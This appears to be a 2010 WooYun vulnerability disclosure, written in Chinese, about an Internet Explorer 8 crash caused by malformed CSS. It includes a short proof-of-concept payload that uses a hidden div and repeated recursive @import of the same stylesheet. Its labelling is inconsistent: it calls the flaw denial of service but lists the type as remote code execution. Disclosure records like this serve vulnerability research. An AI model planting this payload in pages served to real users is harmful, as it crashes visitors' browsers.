漏洞概要 关注数(4) 关注此漏洞
缺陷编号: WooYun-2010-00885
漏洞标题: IE8 CSS解析拒绝服务漏洞
相关厂商: 微软
漏洞作者: 路人甲
提交时间: 2010-11-29 14:51
公开时间: 2010-11-29 14:54
漏洞类型: 远程代码执行
危害等级: 低
自评Rank: 5
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org
Tags标签: 缓冲区溢出 远程代码执行 IE浏览器漏洞利用技巧 浏览器漏洞挖掘
漏洞详情
披露状态:
2010-11-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-11-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启
详细说明:
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
*{
color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:20 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

